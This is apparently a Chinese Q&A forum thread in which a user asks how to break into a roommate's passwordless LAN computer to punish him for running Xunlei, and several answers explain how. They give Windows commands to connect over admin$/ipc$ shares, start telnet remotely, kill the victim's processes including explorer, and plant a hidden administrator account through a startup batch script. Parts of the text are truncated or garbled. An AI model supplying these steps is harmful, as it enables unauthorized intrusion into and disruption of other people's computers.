如何入侵局域网内的机子？他密码空的。他在我们上网时开迅雷，想教训他，望高手教几招。成功了加分

如果你懂dos命令的话，这个方法对你最有用了！
以下 *** 作均在DOS命令行中执行;
1、net use \\对方IP\admin$
2、系统会提示你输入用户名和密码，输入他的用户名和密码后，回车，系统会提示“命令成功完成”
3、开启对方的telnet服务（可能已关闭，不用怕，可以开的）
sc \\对方IP config tlntsvr start= auto （auto前有空格，否则不能成功）
sc \\对方IP start tlntsvr
4、telnet到对方的计算机
telnet 对方IP （如 telnet 1721611）
5、输入用户名和密码（对方计算机的）
6、结束对方的迅雷进程
taskkill /F /IM thunderexe
注意：thunderexe就是迅雷的进程名，但是他使用的迅雷的进程名可能不是这个，如果你知道他的迅雷的进程名最好了，不过一般为thunderexe webthunderexe thunder5exe等，这几个你可以分别执行，确保万无一失，呵呵呵呵呵，同理，可以结束他的QQ，MSN，播放器等！恶搞的话，结束explorerexe，看效果！呵呵呵

通常情况下windows 2000以及windows xp都开启了默认共享，即常说的IPC$漏洞（但我认为这算不上漏洞）。如果对方没有设置管理员密码，你就可以在地址栏中输入：\\IP地址\盘符$（如c盘，则输入c$）回车即可在未经授权的情况下访问对方计算机上的文件。当然，你也可以先在命令提示符中输入以下命令：net use \\IP地址\ipc$ "密码（若无密码则为空）" /user:administrator再通过上面的方法访问局域网内的其他计算机

我查拉135端口端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括>只能告诉你内网入侵相对外网入侵要容易上手，只不过入侵不可能一两下子就可以说得清楚。入侵一台电脑完全可看条件而定的。内网入侵思路如下，先用相应的局域网扫描工具来扫描有漏洞的肉机，然后再进行各自不同的漏洞来达到入侵目的

首先你要知道跟你同一个局域网的用户是否开启了防火墙或者禁止了同一局域网的共享和安全！如果对方禁用了共享，那你是进不去的，只有用歪门邪道进去了方法如下
一、 在该机创建一个批处理文件，内容如下：
net user admin /add
net localgroup administrators admin /add
将上述的批处理文件保存为 adminbat
注：上述批处理文件作用是创建一个名为 admin 的管理员帐户(密码为空)。
二、将此批处理文件作为Windows 的开机启动脚本。
1、在 运行 对话框中输入 gpeditmsc
2、定位到 计算机配置一>Windows设置一>脚本 (启动/关机), 双击右边窗口的 启动,在其中添加先前创建的 adminbat。
3、重新启动计算机(两次)，系统便有了一个名为admin 的管理员
上述 *** 作在Windows 2000/XP中可行，但要保证帐户可以访问注册表,组策略(创建帐户的 *** 作实际上也就是在注册表中添加相应的项和值),而Windows中的缺省的Guest/受限帐户并无此限制。
或许，我们并不需要用Guest帐户去创建一个管理员，但设想如果某个程序只有管理员可执行，是否也就可用上述的方法来实现呢？
小结:Windows系统默认对Guest/受限帐户的限制只是表面上的，作为一个有经验的系统管理员，要做的事情还很多，起码应该禁止受限用户访问/修改注册表,组策略等。
谢谢！

入侵局域网电脑的方法方法一：；
1取得对方IP地址如XXXXXXXX，方；
2判断对方上网的地点，开个DOS窗口键入TRA；
3得到对方电脑的名称，开个DOS窗口键入NBT；第一行是对方电脑名称第二行是对方电脑所在工作组第；
4在Windows目录下有一文件名为LMHOS；
5开DOS窗口键入NBTSTAT-R6在开始

这个有点难度，因为他是内网 你处于外网 说是 入侵
内网的一台机器，但是实际来讲，是对整个局域网的入
侵，那样的话，首先你要先拿到他们服务器网关的权限，
之后再通过服务器对内网的任何一台机器进行扫描
还有一种方法就是通过让你所说的那台内网机器中毒，从
而达到控制的目的！理论上貌似很简单，但实际上很难！

---